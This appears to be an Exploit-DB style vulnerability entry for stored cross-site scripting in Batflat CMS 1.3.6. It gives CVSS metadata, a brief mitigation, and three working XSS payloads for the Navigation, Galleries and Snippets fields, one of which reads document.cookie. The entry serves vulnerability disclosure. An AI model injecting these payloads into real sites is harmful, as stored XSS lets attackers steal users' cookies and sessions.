Batflat CMS 1.3.6 - 'multiple' Stored XSS

vendor:

Batflat CMS

by:

Tadjmen

8.8

CVSS

HIGH

Stored XSS

CWE

Product Name: Batflat CMS

Affected Version From: 1.3.6

Affected Version To: 1.3.6

Patch Exists: NO

Related CWE: N/A

CPE: batflat

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Xammpp on Windows, Firefox Newest

2021

Batflat CMS 1.3.6 – ‘multiple’ Stored XSS

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6. Login with editor account with rights to Navigation, Galleries, Snippets. Navigation - Add link payload: '><img src=x onerror=alert(document.cookie)>. Galleries - Add gallery payload: mlem"><svg/onload=alert(1)>. Snippets - Add Snippets payload: mlem"><svg/onload=alert("TuongNC")>.

Mitigation:

Ensure that user input is properly sanitized and validated before being stored and displayed.

Source

Exploit-DB raw data:

# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
# Date: 22/02/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Version: 1.3.6
# Tested on: Xammpp on Windows, Firefox Newest
# CVE : N/A

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6

Login with editor account with rights to Navigation, Galleries, Snippets

Navigation
- Add link
payload: "><img src=x onerror=alert(document.cookie)>

Galleries
- Add gallery
payload: mlem"><svg/onload=alert(1)>

Snippets
- Add Snippets
payload: mlem"><svg/onload=alert("TuongNC")>

More information:
https://github.com/sruupl/batflat/issues/105